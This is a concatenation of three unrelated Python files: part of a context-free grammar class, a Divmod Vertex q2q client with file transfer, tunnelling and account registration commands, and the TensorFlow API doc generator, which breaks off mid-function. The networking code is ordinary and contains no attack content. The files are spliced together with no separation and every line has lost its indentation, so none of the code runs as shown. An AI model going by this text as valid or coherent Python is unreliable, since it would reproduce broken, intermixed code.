lines = filter(None, string.split('\n'))
split_sides = [[w.strip() for w in line.split('->', 1)] for line in lines]
for split_rule in split_sides:
if len(split_rule) != 2:
raise ValueError('line is not formatted as a rule')
left, right = split_rule
if not (len(left) == 1 and left.isupper()):
raise ValueError('%r is not valid on the left side of a production rule' % left)
self._extra_nonterminals = set()
self._extra_terminals = set()
self._productions = []
for left, right in split_sides:
left_side = Nonterminal(left)
for symbol_string in right.split('|'):
right_side = []
for c in symbol_string.strip():
if c.isupper():
right_side.append(Nonterminal(c))
else:
right_side.append(Terminal(c))
self._productions.append(ProductionRule(left_side, right_side))
if not self._productions:
raise ValueError('no production rules were given')
self._start = self._productions[0].left_side
def _check_productions(self, productions):
if not productions:
raise ValueError('no production rules were given')
for p in productions:
if not isinstance(p, ProductionRule):
raise TypeError('production rules must be instances of ProductionRule')
def _init_productions(self, productions):
self._extra_nonterminals = set()
self._extra_terminals = set()
self._productions = list(productions)
self._start = productions[0].left_side
def _check_tuple(self, nonterminals, terminals, productions, start):
# Check nonterminals
for n in nonterminals:
if not isinstance(n, Nonterminal):
raise TypeError('%r is not an instance of Nonterminal' % n)
# Check terminals
for t in terminals:
if not isinstance(t, Terminal):
raise TypeError('%r is not an instance of Terminal' % t)
# Check production rules
if not productions:
raise ValueError('no production rules were given')
for p in productions:
if not isinstance(p, ProductionRule):
raise TypeError('%r is not an instance of ProductionRule' % p)
if not (p.left_side in nonterminals):
raise ValueError('%r is on the left side of a production rule but is not a nonterminal in the grammar' % p.left_side)
for s in p.right_side:
if not (s in terminals or s in nonterminals):
raise ValueError('%r is on the right side of a production rule but is not a symbol in the grammar' % s)
# Check start symbol
if not isinstance(start, Nonterminal):
raise TypeError('start variable %r is not an instance of Nonterminal' % start)
if not (start in nonterminals):
raise ValueError('start variable %r is not a nonterminal in the grammar' % start)
def _init_tuple(self, nonterminals, terminals, productions, start):
# Assign members
self._productions = list(productions)
self._extra_nonterminals = set(nonterminals) - \
self._get_symbols_of_type(Nonterminal)
self._extra_terminals = set(terminals) - \
self._get_symbols_of_type(Terminal)
self._start = start
def __str__(self):
return '\n'.join(str(p) for p in self.productions)
def __repr__(self):
return "%s('''\n%s\n''')" % (self.__class__.__name__, self)
def _html(self, tohtml):
rows = ['<tr><td>%s</td></tr>' % tohtml(p) for p in self.productions]
return '''\
<table>
%s
</table>
''' % '\n '.join(rows)
def html(self):
return self._html(lambda x: x.html())
def dot_html(self):
return self._html(lambda x: x.dot_html())
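# Illustrative usage sketch (not part of the original module) for the string
# form of the constructor documented in ContextFreeGrammar.__init__: single
# capital letters become nonterminals, everything else terminals, and an empty
# alternative stands for the empty string.
#
#   g = ContextFreeGrammar('''
#   S -> aSb | T
#   T -> cT |
#   ''')
#   # g.start == Nonterminal('S'); Terminal('a') is among g.terminals
#   # str(g) prints the productions back, one per line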
# Copyright 2005 Divmod, Inc. See LICENSE file for details
import os
import sys
import struct
import getpass
from twisted.protocols.amp import AMP
from vertex import q2q, sigma
from twisted.python.usage import Options
from twisted.python import log
from twisted.python.failure import Failure
from twisted.internet import reactor
from twisted.internet import protocol
from twisted.internet.task import LoopingCall
from twisted.internet import error
from vertex.q2qadmin import AddUser
class Q2QAuthorize(Options):
def parseArgs(self, who, password=None):
self.who = who
self.password = password
def reportNoCertificate(self, error):
print "No certificate retrieved:", error.getErrorMessage(), "(see ~/.q2q-client-log for details)"
log.err(error)
return None
def postOptions(self):
def go():
self.parent.getService().authorize(
q2q.Q2QAddress.fromString(self.who),
self.password).addErrback(self.reportNoCertificate).addCallback(lambda x: reactor.stop())
if self.password is None:
self.password = getpass.getpass()
reactor.callWhenRunning(go)
self.parent.start()
class BandwidthEstimator:
bufsize = 20
totalBytes = 0
def __init__(self, message, length):
self.length = length
self.message = message
self.estim = []
self.bytes = 0
self.call = LoopingCall(self.estimateBandwidth)
self.call.start(1)
def estimateBandwidth(self):
bytes = self.bytes
self.totalBytes += bytes
self.estim.append(bytes)
self.message("%0.2f k/s (%0.2d%%)"
% ((sum(self.estim) / len(self.estim)) / 1024.,
(float(self.totalBytes) / self.length) * 100))
if len(self.estim) > self.bufsize:
self.estim.pop(0)
self.bytes = 0
def stop(self):
self.call.stop()
self.estimateBandwidth()
self.message("Finished receiving: %d bytes (%d%%)" % (
self.totalBytes, (float(self.totalBytes) / self.length) * 100))
class FileReceiver(protocol.Protocol):
gotLength = False
estimator = None
def connectionMade(self):
self.f = open(self.factory.program.filename, 'wb')
self.factory.program.parent.info("Started receiving...")
def dataReceived(self, data):
if not self.gotLength:
self.length, = struct.unpack("!Q", data[:8])
data = data[8:]
self.estimator = BandwidthEstimator(self.factory.program.parent.info,
self.length)
self.gotLength = True
self.estimator.bytes += len(data)
self.f.write(data)
def connectionLost(self, reason):
self.f.close()
if self.estimator:
self.estimator.stop()
reactor.stop()
from twisted.protocols.basic import FileSender as fsdr
class FileSender(protocol.Protocol):
def connectionMade(self):
self.file = self.factory.openFile()
self.file.seek(0, 2)
self.length = self.file.tell()
self.file.seek(0)
self.estimator = BandwidthEstimator(self.factory.program.parent.info,
self.length)
self.transport.write(struct.pack("!Q", self.length))
fsdr().beginFileTransfer(
self.file, self).addCallback(
lambda x: self.done())
def done(self):
self.factory.program.parent.info("Done sending data: %d bytes" % (
self.file.tell(),))
self.transport.loseConnection()
def dataReceived(self, data):
print "WTF THE CLIENT IS GETTING DATA", repr(data)
def registerProducer(self, producer, streaming):
self.transport.registerProducer(producer, streaming)
def unregisterProducer(self):
self.transport.unregisterProducer()
def write(self, data):
self.estimator.bytes += len(data)
self.transport.write(data)
def connectionLost(self, reason):
reactor.stop()
class FileSenderFactory(protocol.ClientFactory):
protocol = FileSender
def __init__(self, sendprogram):
self.program = sendprogram
def openFile(self):
return file(self.program.filename, 'r')
def clientConnectionFailed(self, connector, reason):
self.program.parent.info(
"Could not connect: %r" % (reason.getErrorMessage(),))
reactor.stop()
def clientConnectionLost(self, connector, reason):
reason.trap(error.ConnectionDone)
class FileReceiverFactory(protocol.Factory):
def __init__(self, program):
self.program = program
protocol = FileReceiver
class ClientCertificateStore(q2q.DirectoryCertificateStore):
def __init__(self, filepath):
q2q.DirectoryCertificateStore.__init__(self, os.path.expanduser(filepath))
class ClientQ2QService(q2q.Q2QService):
"""
This variant is used by Q2Q clients.
It is I{almost} exactly the same as L{q2q.Q2QService}, except for
implementing a query for a default C{From} address for client connections,
since a client service will generally only register for a single C{From}
address.
"""
def __init__(self, certspath, *a, **kw):
q2q.Q2QService.__init__(self,
certificateStorage=ClientCertificateStore(certspath),
q2qPortnum=0,
*a, **kw)
def getDefaultFrom(self, default=None):
i = self.certificateStorage.localStore.iterkeys()
try:
return i.next()
except StopIteration:
return default
class TunnelProtocol(protocol.Protocol):
def __init__(self, tunnel):
self.tunnel = tunnel
self.buffer = []
def connectionMade(self):
if self.tunnel is not None:
self.tunnel.setTunnel(self)
def dataReceived(self, data):
if self.tunnel is not None:
self.tunnel.transport.write(data)
else:
self.buffer.append(data)
def setTunnel(self, tunnel):
if self.tunnel is None:
self.tunnel = tunnel
self.dataReceived(''.join(self.buffer))
del self.buffer
self.tunnel.setTunnel(self)
class TunnelFactory(protocol.ClientFactory):
def __init__(self, tunnel):
self.tunnel = tunnel
def buildProtocol(self, addr):
return TunnelProtocol(self.tunnel)
def clientConnectionFailed(self, connector, reason):
self.tunnel.transport.loseConnection()
reactor.stop()
clientConnectionLost = clientConnectionFailed
class Q2QTunnel(Options):
optParameters = [
['port', 'p', '13000', 'Port on which to start the TCP server'],
['destination', 'd', None, 'Q2Q address to which to create the tunnel'],
['protocol', 'r', None, 'Q2Q protocol which will operate over the tunnel']]
def postOptions(self):
self.toAddr = q2q.Q2QAddress.fromString(self['destination'])
reactor.listenTCP(int(self['port']), self, interface='127.0.0.1')
self.parent.start()
def doStart(self):
pass
def doStop(self):
pass
def buildProtocol(self, addr):
p = TunnelProtocol(None)
svc = self.parent.getService()
svc.connectQ2Q(self.parent.getFrom(), self.toAddr,
self['protocol'], TunnelFactory(p))
return p
class Q2QReceive(Options):
optParameters = [["port", "p", "41235", "Port to start the listening server on."]]
def parseArgs(self, filename):
self.filename = filename
def postOptions(self):
serv = self.parent.getService()
def pr(x):
return x
def stopit(err):
print "Couldn't Register for File Transfer:", err.getErrorMessage()
log.err(err)
reactor.stop()
serv.listenQ2Q(self.parent.getFrom(),
{'file-transfer': FileReceiverFactory(self)},
"simple file transfer test").addCallback(pr).addErrback(stopit)
self.parent.start()
class Q2QSend(Options):
def parseArgs(self, to, filename):
self.to = to
self.filename = filename
def postOptions(self):
fs = q2q.Q2QAddress.fromString
toAddress = fs(self.to)
fromAddress = self.parent.getFrom()
svc = self.parent.getService()
svc.connectQ2Q(fromAddress, toAddress, 'file-transfer',
FileSenderFactory(self))
self.parent.start()
class TextNexusUI(sigma.BaseNexusUI):
def __init__(self):
sigma.BaseNexusUI.__init__(self)
self.call = LoopingCall(self.report)
self.call.start(5)
def report(self):
print 'Transloads:', len(self.transloads)
for transloadui in self.transloads:
print '---', transloadui.name, '---'
print transloadui.bits.percent()
for peer, mask in transloadui.masks.items():
print peer, mask.percent()
print 'end report'
class Q2QSigma(Options):
def __init__(self, *a, **k):
Options.__init__(self,*a,**k)
self.pushers = []
def opt_push(self, filename):
self.pushers.append([file(filename), filename, []])
def opt_to(self, q2qid):
fs = q2q.Q2QAddress.fromString
addr = fs(q2qid)
self.pushers[-1][-1].append(addr)
def postOptions(self):
nex = sigma.Nexus(self.parent.getService(),
self.parent.getFrom(),
TextNexusUI())
# XXX TODO: there has _GOT_ to be a smarter way to handle text UI for
# this.
for sharefile, sharename, sharepeers in self.pushers:
nex.push(sharefile, sharename, sharepeers)
self.parent.start()
def enregister(svc, newAddress, password):
"""
Register a new account and return a Deferred that fires if it worked.
@param svc: a Q2QService
@param newAddress: a Q2QAddress object
@param password: a shared secret (str)
"""
return svc.connectQ2Q(q2q.Q2QAddress("",""),
q2q.Q2QAddress(newAddress.domain, "accounts"),
'identity-admin',
protocol.ClientFactory.forProtocol(AMP)
).addCallback(
AMP.callRemote,
AddUser,
name=newAddress.resource,
password=password
).addErrback(
Failure.trap,
error.ConnectionDone
)
class Q2QRegister(Options):
synopsis = "<new Q2Q address> <password>"
def parseArgs(self, newaddress, password):
self.newaddress = newaddress
self.password = password
def postOptions(self):
fs = q2q.Q2QAddress.fromString
newAddress = fs(self.newaddress)
svc = self.parent.getService()
def showit(x):
print "%s: %s" % (x.value.__class__, x.getErrorMessage())
enregister(svc, newAddress, self.password).addErrback(
showit).addBoth(lambda nothing: reactor.stop())
self.parent.start()
class Q2QClientProgram(Options):
subCommands = [
['authorize', 'a', Q2QAuthorize, 'Authorize a user'],
['register', 'r', Q2QRegister, 'Create a new user'],
['tunnel', 't', Q2QTunnel, 'Create an SSL tunnel to a given resource'],
['receive', 'l', Q2QReceive, 'Listen for a file-transfer connection'],
['send', 's', Q2QSend, 'Send'],
['sigma', 'g', Q2QSigma, 'Sigma swarming file-transfer']
]
optParameters = [
['from', 'f', None, "Who to send as?"],
['tcp', 'p', None, 'TCP port number'],
['udp', 'u', 0, 'UDP port number'],
['certspath', 'c', "~/.q2qcerts",
"Path to directory full of public/private certificates."],
['logfile', 'l', "~/.q2q-client-log",
"Path to file where logs of client activity will be written."]
]
optFlags = []
service = None
def postOptions(self):
if not self.subCommand:
self.opt_help()
def info(self, message):
sys.stderr.write(">> %s\n" % (message,))
def getService(self):
if self.service is None:
u = self['udp']
if u is not None:
u = int(u)
t = self['tcp']
if t is not None:
t = int(t)
self.service = ClientQ2QService(self['certspath'],
inboundTCPPortnum=t)
return self.service
def getDefaultPath(self):
return os.path.expanduser(os.path.join(self['certspath'], 'default-address'))
def getFrom(self):
fr = self['from']
if not fr:
defpath = self.getDefaultPath()
if os.path.exists(defpath):
fr = file(defpath).read()
else:
fr = self.getService().getDefaultFrom()
if fr is None:
self.info("No default address available, exiting.")
self.info(
" (Try 'q2q register [email protected]; "
"q2q authorize [email protected]')")
sys.exit(19)
self.info("Selected default address:" +fr)
f = file(defpath, 'wb')
f.write(fr)
f.close()
return q2q.Q2QAddress.fromString(fr)
def start(self, portno=None):
import sys
lfname = self['logfile']
if lfname == '-':
lf = sys.stdout
else:
lf = file(os.path.expanduser(lfname), 'ab+')
log.startLogging(lf,
setStdout=False)
srv = self.getService()
from twisted.application.app import startApplication
startApplication(srv, False)
reactor.run()
verbosity = 0
def verboseLogger(self, messageDict):
self.info(' '.join([str(x) for x in messageDict.get('message', [])]))
def opt_verbose(self):
self.verbosity += 1
log.addObserver(log.FileLogObserver(sys.stderr).emit)
opt_v = opt_verbose
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate docs for the TensorFlow Python API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import fnmatch
import os
import shutil
import tempfile
import six
from tensorflow.python.util import tf_inspect
from tensorflow.tools.common import public_api
from tensorflow.tools.common import traverse
from tensorflow.tools.docs import doc_controls
from tensorflow.tools.docs import doc_generator_visitor
from tensorflow.tools.docs import parser
from tensorflow.tools.docs import pretty_docs
from tensorflow.tools.docs import py_guide_parser
def write_docs(output_dir,
parser_config,
yaml_toc,
root_title='TensorFlow',
search_hints=True,
site_api_path=''):
"""Write previously extracted docs to disk.
Write a docs page for each symbol included in the indices of parser_config to
a tree of docs at `output_dir`.
Symbols with multiple aliases will have only one page written about
them, which is referenced for all aliases.
Args:
output_dir: Directory to write documentation markdown files to. Will be
created if it doesn't exist.
parser_config: A `parser.ParserConfig` object, containing all the necessary
indices.
yaml_toc: Set to `True` to generate a "_toc.yaml" file.
root_title: The title name for the root level index.md.
search_hints: (bool) include meta-data search hints at the top of each
output file.
site_api_path: The output path relative to the site root. Used in the
`_toc.yaml` and `_redirects.yaml` files.
Raises:
ValueError: if `output_dir` is not an absolute path
"""
# Make output_dir.
if not os.path.isabs(output_dir):
raise ValueError("'output_dir' must be an absolute path.\n"
" output_dir='%s'" % output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# These dictionaries are used for table-of-contents generation below
# They will contain, after the for-loop below:
# - module name(string):classes and functions the module contains(list)
module_children = {}
# - symbol name(string):pathname (string)
symbol_to_file = {}
# Collect redirects for an api _redirects.yaml file.
redirects = []
# Parse and write Markdown pages, resolving cross-links (@{symbol}).
for full_name, py_object in six.iteritems(parser_config.index):
parser_config.reference_resolver.current_doc_full_name = full_name
if full_name in parser_config.duplicate_of:
continue
# Methods and some routines are documented only as part of their class.
if not (tf_inspect.ismodule(py_object) or tf_inspect.isclass(py_object) or
parser.is_free_function(py_object, full_name, parser_config.index)):
continue
sitepath = os.path.join('api_docs/python',
parser.documentation_path(full_name)[:-3])
# For TOC, we need to store a mapping from full_name to the file
# we're generating
symbol_to_file[full_name] = sitepath
# For a module, remember the module for the table-of-contents
if tf_inspect.ismodule(py_object):
if full_name in parser_config.tree:
module_children.setdefault(full_name, [])
# For something else that's documented,
# figure out what module it lives in
else:
subname = str(full_name)
while True:
subname = subname[:subname.rindex('.')]
if tf_inspect.ismodule(parser_config.index[subname]):
module_children.setdefault(subname, []).append(full_name)
break
# Generate docs for `py_object`, resolving references.
page_info = parser.docs_for_object(full_name, py_object, parser_config)
path = os.path.join(output_dir, parser.documentation_path(full_name))
directory = os.path.dirname(path)
try:
if not os.path.exists(directory):
os.makedirs(directory)
# This function returns raw bytes in PY2 or unicode in PY3.
if search_hints:
content = [page_info.get_metadata_html()]
else:
content = ['']
content.append(pretty_docs.build_md_page(page_info))
text = '\n'.join(content)
if six.PY3:
text = text.encode('utf-8')
with open(path, 'wb') as f:
f.write(text)
except OSError:
raise OSError(
'Cannot write documentation for %s to %s' % (full_name, directory))
duplicates = parser_config.duplicates.get(full_name, [])
if not duplicates:
continue
duplicates = [item for item in duplicates if item != full_name]
for dup in duplicates:
from_path = os.path.join(site_api_path, dup.replace('.', '/'))
to_path = os.path.join(site_api_path, full_name.replace('.', '/'))
redirects.append((
os.path.join('/', from_path),
os.path.join('/', to_path)))
if redirects:
redirects = sorted(redirects)
template = ('- from: {}\n'
' to: {}\n')
redirects = [template.format(f, t) for f, t in redirects]
api_redirects_path = os.path.join(output_dir, '_redirects.yaml')
with open(api_redirects_path, 'w') as redirect_file:
redirect_file.write('redirects:\n')
redirect_file.write(''.join(redirects))
if yaml_toc:
# Generate table of contents
# Put modules in alphabetical order, case-insensitive
modules = sorted(module_children.keys(), key=lambda a: a.upper())
leftnav_path = os.path.join(output_dir, '_toc.yaml')
with open(leftnav_path, 'w') as f:
# Generate header
f.write('# Automatically generated file; please do not edit\ntoc:\n')
for module in modules:
indent_num = module.count('.')
# Don't list `tf.submodule` inside `tf`
indent_num = max(indent_num, 1)
indent = ' '*indent_num
if indent_num > 1:
# tf.contrib.bayesflow.entropy will be under
# tf.contrib->bayesflow->entropy
title = module.split('.')[-1]
else:
title = module
header = [
'- title: ' + title,
' section:',
' - title: Overview',
' path: ' + os.path.join('/', site_api_path,
symbol_to_file[module])]
header = ''.join([indent+line+'\n' for line in header])
f.write(header)
symbols_in_module = module_children.get(module, [])
# Sort case-insensitive, if equal sort case sensitive (upper first)
symbols_in_module.sort(key=lambda a: (a.upper(), a))
for full_name in symbols_in_module:
item = [
' - title: ' + full_name[len(module) + 1:],
' path: ' + os.path.join('/', site_api_path,
symbol_to_file[full_name])]
item = ''.join([indent+line+'\n' for line in item])
f.write(item)
# Write a global index containing all full names with links.
with open(os.path.join(output_dir, 'index.md'), 'w') as f:
f.write(
parser.generate_global_index(root_title, parser_config.index,
parser_config.reference_resolver))
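# Illustrative call (a sketch: it assumes a fully populated `parser.ParserConfig`
# named `parser_config`, which the surrounding driver code would normally build):
#
#   write_docs(
#       output_dir='/tmp/api_docs/python',  # must be an absolute path
#       parser_config=parser_config,
#       yaml_toc=True,
#       root_title='TensorFlow',
#       search_hints=True,
#       site_api_path='api_docs/python')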
def add_dict_to_dict(add_from, add_to):
for key in add_from:
if key in add_to:
add_to[key].extend(add_from[key])
else:
add_to[key] = add_from[key]
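# For example (illustrative): keys already present in `add_to` are extended,
# new keys are added:
#
#   target = {'tf.test': ['mock']}
#   add_dict_to_dict({'tf.test': ['other'], 'tf.compat': ['v1']}, target)
#   # target == {'tf.test': ['mock', 'other'], 'tf.compat': ['v1']}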
# Exclude some libraries in contrib from the documentation altogether.
def _get_default_private_map():
return {
'tf.contrib.autograph': ['utils', 'operators'],
'tf.test': ['mock'],
'tf.compat': ['v1', 'v2'],
}
# Exclude members of some libraries.
def _get_default_do_not_descend_map():
# TODO(markdaoust): Use docs_controls decorators, locally, instead.
return {
'tf': ['cli', 'lib', 'wrappers'],
'tf.contrib': [
'compiler',
'grid_rnn',
# Block contrib.keras to de-clutter the docs
'keras',
'labeled_tensor',
'quantization',
'session_bundle',
'slim',
'solvers',
'specs',
'tensor_forest',
'tensorboard',
'testing',
'tfprof',
],
'tf.contrib.bayesflow': [
'special_math', 'stochastic_gradient_estimators',
'stochastic_variables'
],
'tf.contrib.ffmpeg': ['ffmpeg_ops'],
'tf.contrib.graph_editor': [
'edit', 'match', 'reroute', 'subgraph', 'transform', 'select', 'util'
],
'tf.contrib.keras': ['api', 'python'],
'tf.contrib.layers': ['feature_column', 'summaries'],
'tf.contrib.learn': [
'datasets',
'head',
'graph_actions',
'io',
'models',
'monitors',
'ops',
'preprocessing',
'utils',
],
'tf.contrib.util': ['loader'],
}
class DocControlsAwareCrawler(public_api.PublicAPIVisitor):
"""A `docs_controls` aware API-crawler."""
def _is_private(self, path, name, obj):
if doc_controls.should_skip(obj):
return True
return super(DocControlsAwareCrawler, self)._is_private(path, name, obj)
def extract(py_modules,
private_map,
do_not_descend_map,
visitor_cls=doc_generator_visitor.DocGeneratorVisitor):
"""Extract docs from tf namespace and write them to disk."""
# Traverse the first module.
visitor = visitor_cls(py_modules[0][0])
api_visitor = DocControlsAwareCrawler(visitor)
api_visitor.set_root_name(py_modules[0][0])
add_dict_to_dict(private_map, api_visitor.private_map)
add_dict_to_dict(do_not_descend_map, api_visitor.do_not_descend_map)
traverse.traverse(py_modules[0][1], api_visitor)
# Traverse all py_modules after the first:
for module_name, module in py_modules[1:]:
visitor.set_root_name(module_name)
api_visitor.set_root_name(module_name)
traverse.traverse(module, api_visitor)
return visitor
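# Minimal sketch of calling extract() directly (real callers normally go
# through DocGenerator.run_extraction; the module tuple is a placeholder):
#
#   import tensorflow as tf
#   visitor = extract([('tf', tf)], _get_default_private_map(),
#                     _get_default_do_not_descend_map())
#   print(len(visitor.index))  # number of documented symbols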
class _GetMarkdownTitle(py_guide_parser.PyGuideParser):
"""Extract the title from a .md file."""
def __init__(self):
self.title = None
py_guide_parser.PyGuideParser.__init__(self)
def process_title(self, _, title):
if self.title is None: # only use the first title
self.title = title
class _DocInfo(object):
"""A simple struct for holding a doc's url and title."""
def __init__(self, url, title):
self.url = url
self.title = title
def build_doc_index(src_dir):
"""Build an index from a keyword designating a doc to _DocInfo objects."""
doc_index = {}
if not os.path.isabs(src_dir):
raise ValueError("'src_dir' must be an absolute path.\n"
" src_dir='%s'" % src_dir)
if not os.path.exists(src_dir):
raise ValueError("'src_dir' path must exist.\n"
" src_dir='%s'" % src_dir)
for dirpath, _, filenames in os.walk(src_dir):
suffix = os.path.relpath(path=dirpath, start=src_dir)
for base_name in filenames:
if not base_name.endswith('.md'):
continue
title_parser = _GetMarkdownTitle()
title_parser.process(os.path.join(dirpath, base_name))
if title_parser.title is None:
msg = ('`{}` has no markdown title (# title)'.format(
os.path.join(dirpath, base_name)))
raise ValueError(msg)
key_parts = os.path.join(suffix, base_name[:-3]).split('/')
if key_parts[-1] == 'index':
key_parts = key_parts[:-1]
doc_info = _DocInfo(os.path.join(suffix, base_name), title_parser.title)
doc_index[key_parts[-1]] = doc_info
if len(key_parts) > 1:
doc_index['/'.join(key_parts[-2:])] = doc_info
return doc_index
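# Sketch of the resulting index for a hypothetical `guides/eager.md` whose
# first heading is "# Eager execution": both doc_index['eager'] and
# doc_index['guides/eager'] map to a _DocInfo with url='guides/eager.md'
# and title='Eager execution'.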
class _GuideRef(object):
def __init__(self, base_name, title, section_title, section_tag):
self.url = 'api_guides/python/' + (('%s#%s' % (base_name, section_tag))
if section_tag else base_name)
self.link_text = (('%s > %s' % (title, section_title))
if section_title else title)
def make_md_link(self, url_prefix):
return '[%s](%s%s)' % (self.link_text, url_prefix, self.url)
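# Example with hypothetical guide names:
#
#   ref = _GuideRef('math_ops', 'Math', 'Arithmetic Operators', 'arithmetic')
#   ref.make_md_link('../../')
#   # -> '[Math > Arithmetic Operators](../../api_guides/python/math_ops#arithmetic)'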
class _GenerateGuideIndex(py_guide_parser.PyGuideParser):
"""Turn guide files into an index from symbol name to a list of _GuideRefs."""
def __init__(self):
self.index = {}
py_guide_parser.PyGuideParser.__init__(self)
def process(self, full_path, base_name):
"""Index a file, reading from `full_path`, with `base_name` as the link."""
self.full_path = full_path
self.base_name = base_name
self.title = None
self.section_title = None
self.section_tag = None
py_guide_parser.PyGuideParser.process(self, full_path)
def process_title(self, _, title):
if self.title is None: # only use the first title
self.title = title
def process_section(self, _, section_title, tag):
self.section_title = section_title
self.section_tag = tag
def process_line(self, _, line):
"""Index the file and section of each `symbol` reference."""
for match in parser.AUTO_REFERENCE_RE.finditer(line):
val = self.index.get(match.group(1), [])
val.append(
_GuideRef(self.base_name, self.title, self.section_title,
self.section_tag))
self.index[match.group(1)] = val
def _build_guide_index(guide_src_dir):
"""Return dict: symbol name -> _GuideRef from the files in `guide_src_dir`."""
index_generator = _GenerateGuideIndex()
if os.path.exists(guide_src_dir):
for full_path, base_name in py_guide_parser.md_files_in_dir(guide_src_dir):
index_generator.process(full_path, base_name)
return index_generator.index
class _UpdateTags(py_guide_parser.PyGuideParser):
"""Rewrites a Python guide so that each section has an explicit id tag.
"section" here refers to blocks delimited by second level headings.
"""
def process_section(self, line_number, section_title, tag):
self.replace_line(line_number, '<h2 id="%s">%s</h2>' % (tag, section_title))
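# For example (hypothetical guide content): a section heading "## Sharding"
# whose PyGuideParser tag is "sharding" is rewritten in place as
# '<h2 id="sharding">Sharding</h2>', so existing "#sharding" anchors keep
# resolving after the guide is rendered.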
def update_id_tags_inplace(src_dir):
"""Set explicit ids on all second-level headings to ensure back-links work.
Args:
src_dir: The directory of md-files to convert (inplace).
"""
tag_updater = _UpdateTags()
for dirpath, _, filenames in os.walk(src_dir):
for base_name in filenames:
if not base_name.endswith('.md'):
continue
full_path = os.path.join(src_dir, dirpath, base_name)
# Tag updater loads the file, makes the replacements, and returns the
# modified file contents
content = tag_updater.process(full_path)
with open(full_path, 'w') as f:
f.write(content)
EXCLUDED = set(['__init__.py', 'OWNERS', 'README.txt'])
def replace_refs(src_dir, output_dir, reference_resolver, file_pattern='*.md'):
"""Fix @{} references in all files under `src_dir` matching `file_pattern`.
A matching directory structure, with the modified files is
written to `output_dir`.
`{"__init__.py","OWNERS","README.txt"}` are skipped.
Files not matching `file_pattern` (using `fnmatch`) are copied with no change.
Also, files in the `api_guides/python` directory get explicit ids set on all
heading-2s to ensure back-links work.
Args:
src_dir: The directory to convert files from.
output_dir: The root directory to write the resulting files to.
reference_resolver: A `parser.ReferenceResolver` to make the replacements.
    file_pattern: Only replace references in files matching `file_pattern`
      (using fnmatch). Non-matching files are copied unchanged.
"""
# Iterate through all the source files and process them.
for dirpath, _, filenames in os.walk(src_dir):
# How to get from `dirpath` to api_docs/python/
relative_path_to_root = os.path.relpath(
path=os.path.join(src_dir, 'api_docs/python'), start=dirpath)
# Make the directory under output_dir.
new_dir = os.path.join(output_dir,
os.path.relpath(path=dirpath, start=src_dir))
if not os.path.exists(new_dir):
os.makedirs(new_dir)
for base_name in filenames:
if base_name in EXCLUDED:
continue
full_in_path = os.path.join(dirpath, base_name)
# Set the `current_doc_full_name` so bad files can be reported on errors.
reference_resolver.current_doc_full_name = full_in_path
suffix = os.path.relpath(path=full_in_path, start=src_dir)
full_out_path = os.path.join(output_dir, suffix)
# Copy files that do not match the file_pattern, unmodified.
if not fnmatch.fnmatch(base_name, file_pattern):
shutil.copyfile(full_in_path, full_out_path)
continue
with open(full_in_path, 'rb') as f:
content = f.read().decode('utf-8')
content = reference_resolver.replace_references(content,
relative_path_to_root)
with open(full_out_path, 'wb') as f:
f.write(content.encode('utf-8'))
class DocGenerator(object):
"""Main entry point for generating docs."""
def __init__(self):
self.argument_parser = argparse.ArgumentParser()
self._py_modules = None
self._private_map = _get_default_private_map()
self._do_not_descend_map = _get_default_do_not_descend_map()
self.yaml_toc = True
self.argument_parser.add_argument(
'--no_search_hints',
dest='search_hints',
action='store_false',
default=True)
self.argument_parser.add_argument(
'--site_api_path',
type=str, default='',
        help='The path from the site-root to the api_docs '
        'directory for this project')
self.argument_parser.add_argument(
'--api_cache_out_path',
type=str,
default=None,
help='Path to store a json-serialized api-index, so links can be '
'inserted into docs without rebuilding the api_docs')
def add_output_dir_argument(self):
self.argument_parser.add_argument(
'--output_dir',
type=str,
default=None,
required=True,
help='Directory to write docs to.')
def add_src_dir_argument(self):
self.argument_parser.add_argument(
'--src_dir',
type=str,
default=tempfile.mkdtemp(),
required=False,
help='Optional directory of source docs to add api_docs links to')
def add_base_dir_argument(self, default_base_dir):
self.argument_parser.add_argument(
'--base_dir',
type=str,
default=default_base_dir,
help='Base directory to strip from file names referenced in docs.')
def parse_known_args(self):
flags, _ = self.argument_parser.parse_known_args()
return flags
def add_to_private_map(self, d):
add_dict_to_dict(d, self._private_map)
def add_to_do_not_descend_map(self, d):
add_dict_to_dict(d, self._do_not_descend_map)
def set_private_map(self, d):
self._private_map = d
def set_do_not_descend_map(self, d):
self._do_not_descend_map = d
def set_py_modules(self, py_modules):
self._py_modules = py_modules
def py_module_names(self):
if self._py_modules is None:
raise RuntimeError(
'Must call set_py_modules() before running py_module_names().')
return [name for (name, _) in self._py_modules]
def make_reference_resolver(self, visitor, doc_index):
return parser.ReferenceResolver.from_visitor(
visitor, doc_index, py_module_names=self.py_module_names())
def make_parser_config(self, visitor, reference_resolver, guide_index,
base_dir):
return parser.ParserConfig(
reference_resolver=reference_resolver,
duplicates=visitor.duplicates,
duplicate_of=visitor.duplicate_of,
tree=visitor.tree,
index=visitor.index,
reverse_index=visitor.reverse_index,
guide_index=guide_index,
base_dir=base_dir)
def run_extraction(self):
return extract(self._py_modules, self._private_map,
self._do_not_descend_map)
def build(self, flags):
"""Build all the docs.
This produces two outputs
python api docs:
* generated from modules set with `set_py_modules`.
* written to '{FLAGS.output_dir}/api_docs/python/'
non-api docs:
* Everything in '{FLAGS.src_dir}' is copied to '{FLAGS.output_dir}'.
* '@{}' references in '.md' files are replaced with links.
* '.md' files under 'api_guides/python' have explicit ids set for their
second level headings.
Args:
flags:
* src_dir: Where to fetch the non-api-docs.
* base_dir: Base of the docs directory (Used to build correct
relative links).
* output_dir: Where to write the resulting docs.
Returns:
The number of errors encountered while processing.
"""
# Extract the python api from the _py_modules
doc_index = build_doc_index(flags.src_dir)
visitor = self.run_extraction()
reference_resolver = self.make_reference_resolver(visitor, doc_index)
if getattr(flags, 'api_cache_out_path', None):
reference_resolver.to_json_file(flags.api_cache_out_path)
# Build the guide_index for the api_docs back links.
root_title = getattr(flags, 'root_title', 'TensorFlow')
guide_index = _build_guide_index(
os.path.join(flags.src_dir, 'api_guides/python'))
